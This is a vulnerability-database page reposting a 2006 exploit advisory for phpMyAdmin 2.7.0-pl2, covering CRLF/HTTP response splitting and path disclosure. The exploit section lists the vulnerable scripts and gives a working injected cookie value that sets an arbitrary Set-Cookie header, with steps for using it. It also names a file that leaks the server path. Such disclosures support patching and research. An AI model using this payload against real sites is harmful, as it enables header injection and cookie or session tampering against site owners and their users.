PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053082 漏洞类型
发布时间 2006-12-08 更新时间 2006-12-08
CVE编号 CVE-2006-6374
CVE-2006-6373
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006120064
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
************************************************************************
*************
# Title   :  PhpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/Http Response Splitting Vulnerability
# Author  :   ajann
# Contact :   :(
# Tested  :  Just 2.7.0-pl2

************************************************************************
*************

[[CRLF]]]------------------------------------------------------

Files----

/css/phpmyadmin.css.php
/db_create.php
/index.php
/left.php
/libraries/session.inc.php
/libraries/transformations/overview.php
/querywindow.php
/server_engines.php
/...
/..

/Files----

Cookie:

->Open Cookie Editor
->Find the phpMyAdmin value
->Write it ;

phpMyAdmin=%0d%0aSet-Cookie%3Asome%3Dvalue

New Cookie => some=value

.....
..

[[/CRLF]]]

[[PATH]]]------------------------------------------------------

File----

//libraries/common.lib.php

/File----

[[/PATH]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!